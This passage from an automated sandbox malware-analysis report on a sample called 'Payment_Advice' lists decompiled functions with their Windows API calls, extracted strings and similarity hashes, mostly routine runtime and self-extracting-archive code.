                                                                                                    • Instruction ID: b1328f6afb50fe89df482e2e55d8488842b458049c498bb909859f2a775b4d12
                                                                                                    • Opcode Fuzzy Hash: 2498362b9781d22f364279affc93e93bc76db478f0dc5e50037bc8b70f1460ee
                                                                                                    • Instruction Fuzzy Hash: C7314F326012269FEB20AA79F84AB6A7FE9FF52310F544819E558D71E2DF31AC44CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005296F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00529705
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 00529711
                                                                                                    • _free.LIBCMT ref: 0052971C
                                                                                                    • _free.LIBCMT ref: 00529727
                                                                                                    • _free.LIBCMT ref: 00529732
                                                                                                    • _free.LIBCMT ref: 0052973D
                                                                                                    • _free.LIBCMT ref: 00529748
                                                                                                    • _free.LIBCMT ref: 00529753
                                                                                                    • _free.LIBCMT ref: 0052975E
                                                                                                    • _free.LIBCMT ref: 0052976C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0dS
                                                                                                    • API String ID: 776569668-685347439
                                                                                                    • Opcode ID: 12c6efec3fc8e957b0b3dc606272bba1c5fdcb4103f45e0eb90245c26afdb888
                                                                                                    • Instruction ID: 4bfe408bd3511010ce5448b0d72ac72fa05f77a32bbeda54cfd42a169f68dd9a
                                                                                                    • Opcode Fuzzy Hash: 12c6efec3fc8e957b0b3dc606272bba1c5fdcb4103f45e0eb90245c26afdb888
                                                                                                    • Instruction Fuzzy Hash: 0E11C67611101AAFDB01EF94E846CE93FB5FF55350B1158A0FA084F2B2DE31DA549B84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00519711 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00519736
                                                                                                    • _wcslen.LIBCMT ref: 005197D6
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 005197E5
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00519806
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                                    • String ID: FvnQ$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                    • API String ID: 1116704506-1813482186
                                                                                                    • Opcode ID: 810591c16aa82ed61d28d4a53100d37858c499085afb111e2a3ae800f094b4eb
                                                                                                    • Instruction ID: 33a59ec5f95066f28d2f1ebac3f78461b08658d34a1626799a0ffdd799fd13ef
                                                                                                    • Opcode Fuzzy Hash: 810591c16aa82ed61d28d4a53100d37858c499085afb111e2a3ae800f094b4eb
                                                                                                    • Instruction Fuzzy Hash: B73127325083127AF725AF24AC1AFAB7F9CFF93710F14011DF501961D2EB64AA4983A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0051D6C1
                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0051D6ED
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D709
                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0051D720
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051D734
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0051D75D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051D764
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0051D76D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                    • String ID: STATIC
                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                    • Opcode ID: eb54b3bf232e7672aba2038cc5859adb67834334cfb409c0cfc286172c8eb124
                                                                                                    • Instruction ID: 03a05a4c2e7a81de9ac2a29e7995651125d183a5e0405c9536e387f85681c4f7
                                                                                                    • Opcode Fuzzy Hash: eb54b3bf232e7672aba2038cc5859adb67834334cfb409c0cfc286172c8eb124
                                                                                                    • Instruction Fuzzy Hash: 5511D2729013117BF7216B749C4EFEF7E6CFB94721F004110FA41A21D2DAA48A8996B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 322700389-393685449
                                                                                                    • Opcode ID: bfac7d3df54529a00459b74cd9e40856c97aa6488959284207edabbaddb2b4e4
                                                                                                    • Instruction ID: 552d87d5739cb6b9b79348c4ed729abc68a9d6bdbed79f3b4f300a2827629a84
                                                                                                    • Opcode Fuzzy Hash: bfac7d3df54529a00459b74cd9e40856c97aa6488959284207edabbaddb2b4e4
                                                                                                    • Instruction Fuzzy Hash: 81B1AD3580022AEFCF25DFA4E9859AEBFB5FF46310F144059F8016B292C739DA61CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00506FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00506FAA
                                                                                                    • _wcslen.LIBCMT ref: 00507013
                                                                                                    • _wcslen.LIBCMT ref: 00507084
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                    • Opcode ID: a65aaf77ccf533e90e5bc257c60612268dba4b99426f81ddf56e995a6ca6c8b1
                                                                                                    • Instruction ID: e07e088deb434e741a1d33e238245b69ee20a415185b46842b896553ae35706b
                                                                                                    • Opcode Fuzzy Hash: a65aaf77ccf533e90e5bc257c60612268dba4b99426f81ddf56e995a6ca6c8b1
                                                                                                    • Instruction Fuzzy Hash: D241E9B1D0874A6AEB20E7709D4AFEE7F6CBF49304F004455F945A61C2D674BA88C761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B610
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0051B637
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0051B650
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0051B661
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0051B66A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0051B67E
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0051B694
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                    • String ID: LICENSEDLG
                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                    • Opcode ID: 54069ec4adc47e0e01afd8bd6b436d9bc4eca329539e9f1917c17026ff3d8bfe
                                                                                                    • Instruction ID: 0feab71eaa036a1ab7ff8b9b3bd560a36944a2e3a266fe585f10445dc4f2685b
                                                                                                    • Opcode Fuzzy Hash: 54069ec4adc47e0e01afd8bd6b436d9bc4eca329539e9f1917c17026ff3d8bfe
                                                                                                    • Instruction Fuzzy Hash: 5821F631204215BBF3115B69ED4EFBB3F6CFB66B55F010014F600961A0DBA2AE48F631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8E9784F4,00000001,00000000,00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FD99
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE14
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0051FE1F
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE48
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE52
                                                                                                    • GetLastError.KERNEL32(80070057,8E9784F4,00000001,00000000,00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE57
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE6A
                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0050AF6C,ROOT\CIMV2), ref: 0051FE80
                                                                                                    • _com_issue_error.COMSUPP ref: 0051FE93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353541977-0
                                                                                                    • Opcode ID: 56b4bcb4575aa63d42be57fa903ff8bcf4f59d36c120e175b69609065898ea68
                                                                                                    • Instruction ID: ee52bdeb7b3fa32b17a71f44fe2f94b48920fb29c07b9333cbc9cb7272c5eaaa
                                                                                                    • Opcode Fuzzy Hash: 56b4bcb4575aa63d42be57fa903ff8bcf4f59d36c120e175b69609065898ea68
                                                                                                    • Instruction Fuzzy Hash: 2241B775A00215ABEB109F64D849BEEBFA8FB44710F104239F905E7291D7349984D7E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                    • Opcode ID: f542206f332b8aca56483f88fcf29ca42de530d361fb234aebf385cf0ebf0652
                                                                                                    • Instruction ID: 45fc588737409fa5eb011450ba84c43240cea54c6eb4294b342d617c1a6da9fb
                                                                                                    • Opcode Fuzzy Hash: f542206f332b8aca56483f88fcf29ca42de530d361fb234aebf385cf0ebf0652
                                                                                                    • Instruction Fuzzy Hash: D3717E75A0021AAFEB14DF64CC999AFBBB9FF48710B14055DF512E72A0CB306E45DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00509387
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 005093AA
                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 005093C9
                                                                                                      • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • _swprintf.LIBCMT ref: 00509465
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 005094D4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00509514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: rtmp%d
                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                    • Opcode ID: ed96bc5c227149f5e19b36e140893de21cbe8523d1b04b98856c8e0a8f33a881
                                                                                                    • Instruction ID: daf3c493c96a14b4b17a55454c2c0e0d4dcfcdf38048389723015ba6cf26c370
                                                                                                    • Opcode Fuzzy Hash: ed96bc5c227149f5e19b36e140893de21cbe8523d1b04b98856c8e0a8f33a881
                                                                                                    • Instruction Fuzzy Hash: B74198B190025A66DF21EBA1CC49DDE7B7CBF81344F0048A5B649E3096DB388BC99B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00501100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: UQ$pQ$zQ
                                                                                                    • API String ID: 176396367-1608347092
                                                                                                    • Opcode ID: c85ee76291f009886d6a09263ef4c0d83461f15d99de0128b8ada3f45e0a490a
                                                                                                    • Instruction ID: d8283f57c72757004424760ffce4a6a1d7f741cf0c9d3dbc088bacf55f39cc33
                                                                                                    • Opcode Fuzzy Hash: c85ee76291f009886d6a09263ef4c0d83461f15d99de0128b8ada3f45e0a490a
                                                                                                    • Instruction Fuzzy Hash: 9641C37190066A9BDB219F68CC0A9EF7FB8FF41310F000019FD45E7285DA74AE898BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00519ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00519EEE
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00519F44
                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00519FDB
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00519FE3
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00519FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$RectText
                                                                                                    • String ID: Q$RarHtmlClassName
                                                                                                    • API String ID: 3937224194-4289036385
                                                                                                    • Opcode ID: a13040a592d3dd4037a64de0a652f6c6b69b4b15aef243451a8c3c58b82ab587
                                                                                                    • Instruction ID: 4022618b224e75c982edbc5e9ef95a281e1a81d3b8641e47c4781248a3df5bdf
                                                                                                    • Opcode Fuzzy Hash: a13040a592d3dd4037a64de0a652f6c6b69b4b15aef243451a8c3c58b82ab587
                                                                                                    • Instruction Fuzzy Hash: 3641E231404210AFEB229F68DC4CBABBFA8FF59711F004558F8499A052DB74EA89DF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00511218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __aulldiv.LIBCMT ref: 0051122E
                                                                                                      • Part of subcall function 0050B146: GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00511251
                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00511263
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00511274
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511284
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511294
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 005112CF
                                                                                                    • __aullrem.LIBCMT ref: 00511379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1247370737-0
                                                                                                    • Opcode ID: db603d39b6e8efb195d50581ccbd358a1d2a588fa45022188c6a506035829771
                                                                                                    • Instruction ID: fa5e2286fd8d8c204862f7d3814473df6c2b189fb0330ada100be996f0230008
                                                                                                    • Opcode Fuzzy Hash: db603d39b6e8efb195d50581ccbd358a1d2a588fa45022188c6a506035829771
                                                                                                    • Instruction Fuzzy Hash: 624107B1508305AFD710DF65C8849ABBBE9FB88314F008D2EF596C2210E738E649DB66
                                                                                                    Uniqueness

